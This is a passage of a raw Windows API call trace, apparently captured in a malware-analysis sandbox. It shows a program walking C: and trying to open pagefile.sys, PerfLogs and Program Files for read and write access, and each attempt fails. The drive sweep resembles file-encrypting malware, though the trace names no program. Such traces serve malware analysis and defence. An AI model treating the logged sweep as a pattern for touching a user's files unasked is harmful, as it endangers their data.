dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0087.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.864] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.864] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.864] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.864] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.864] AreFileApisANSI () returned 1 [0087.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\pagefile.sys", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\pagefile.sys", lpUsedDefaultChar=0x0) returned 16 [0087.864] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.864] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0087.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0087.864] AreFileApisANSI () returned 1 [0087.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0087.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x883b0, cchWideChar=16 | out: lpWideCharStr="C:\\pagefile.sys") returned 16 [0087.864] CreateFileW (lpFileName="C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.864] GetLastError () returned 0x20 [0087.864] GetLastError () returned 0x20 [0087.864] SetLastError (dwErrCode=0x20) [0087.865] GetLastError () returned 0x20 [0087.865] SetLastError (dwErrCode=0x20) [0087.865] GetLastError () returned 0x20 [0087.865] SetLastError (dwErrCode=0x20) [0087.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.865] AreFileApisANSI () returned 1 [0087.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0087.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x885b8, cchWideChar=16 | out: lpWideCharStr="C:\\pagefile.sys") returned 16 [0087.865] CreateFileW (lpFileName="C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.865] GetLastError () returned 0x20 [0087.865] GetLastError () returned 0x20 [0087.865] SetLastError (dwErrCode=0x20) [0087.865] GetLastError () returned 0x20 [0087.865] SetLastError (dwErrCode=0x20) [0087.865] GetLastError () returned 0x20 [0087.865] SetLastError (dwErrCode=0x20) [0087.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0087.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0087.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.865] FindNextFileW (in: hFindFile=0x78850, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0087.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0087.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.866] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.866] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.866] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.866] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.866] AreFileApisANSI () returned 1 [0087.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\PerfLogs", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\PerfLogs", lpUsedDefaultChar=0x0) returned 12 [0087.866] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.866] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0087.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0087.866] AreFileApisANSI () returned 1 [0087.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0087.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x18) returned 0x5cac0 [0087.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x5cac0, cchWideChar=12 | out: lpWideCharStr="C:\\PerfLogs") returned 12 [0087.867] CreateFileW (lpFileName="C:\\PerfLogs" (normalized: "c:\\perflogs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.867] GetLastError () returned 0x5 [0087.867] GetLastError () returned 0x5 [0087.867] SetLastError (dwErrCode=0x5) [0087.867] GetLastError () returned 0x5 [0087.867] SetLastError (dwErrCode=0x5) [0087.867] GetLastError () returned 0x5 [0087.867] SetLastError (dwErrCode=0x5) [0087.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.867] AreFileApisANSI () returned 1 [0087.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0087.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x18) returned 0x5ca00 [0087.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x5ca00, cchWideChar=12 | out: lpWideCharStr="C:\\PerfLogs") returned 12 [0087.867] CreateFileW (lpFileName="C:\\PerfLogs" (normalized: "c:\\perflogs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.867] GetLastError () returned 0x5 [0087.867] GetLastError () returned 0x5 [0087.867] SetLastError (dwErrCode=0x5) [0087.867] GetLastError () returned 0x5 [0087.867] SetLastError (dwErrCode=0x5) [0087.867] GetLastError () returned 0x5 [0087.867] SetLastError (dwErrCode=0x5) [0087.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0087.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0087.868] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.868] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.868] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.868] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.868] FindNextFileW (in: hFindFile=0x78850, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x40edfa76, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x40edfa76, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0087.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0087.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0087.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0087.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0087.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0087.868] FindFirstFileExW (in: lpFileName="C:\\PerfLogs\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78950 [0087.868] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.869] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0087.869] FindClose (in: hFindFile=0x78950 | out: hFindFile=0x78950) returned 1 [0087.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0087.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46128 [0087.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0087.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0087.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46128 | out: hHeap=0x20000) returned 1 [0087.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0087.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0087.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0087.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0087.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0087.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0087.869] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.869] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.869] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.869] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0087.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.870] AreFileApisANSI () returned 1 [0087.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files", lpUsedDefaultChar=0x0) returned 17 [0087.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0087.870] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.870] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0087.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0087.870] AreFileApisANSI () returned 1 [0087.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0087.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x22) returned 0x7a908 [0087.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x7a908, cchWideChar=17 | out: lpWideCharStr="C:\\Program Files") returned 17 [0087.870] CreateFileW (lpFileName="C:\\Program Files" (normalized: "c:\\program files"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.870] GetLastError () returned 0x5 [0087.870] GetLastError () returned 0x5 [0087.870] SetLastError (dwErrCode=0x5) [0087.870] GetLastError () returned 0x5 [0087.870] SetLastError (dwErrCode=0x5) [0087.870] GetLastError () returned 0x5 [0087.870] SetLastError (dwErrCode=0x5) [0087.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a908 | out: hHeap=0x20000) returned 1 [0087.870] AreFileApisANSI () returned 1 [0087.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0087.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x22) returned 0x7ac98 [0087.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x7ac98, cchWideChar=17 | out: lpWideCharStr="C:\\Program Files") returned 17 [0087.871] CreateFileW (lpFileName="C:\\Program Files" (normalized: "c:\\program files"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.871] GetLastError () returned 0x5 [0087.871] GetLastError () returned 0x5 [0087.871] SetLastError (dwErrCode=0x5) [0087.871] GetLastError () returned 0x5 [0087.871] SetLastError (dwErrCode=0x5) [0087.871] GetLastError () returned 0x5 [0087.871] SetLastError (dwErrCode=0x5) [0087.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ac98 | out: hHeap=0x20000) returned 1 [0087.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0087.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0087.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0087.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0087.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0087.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0087.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0087.871] FindNextFileW (in: hFindFile=0x78850, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xe7a165b3, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xe7a165b3, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0087.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0087.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0087.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0087.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0087.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0087.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0087.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0087.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: 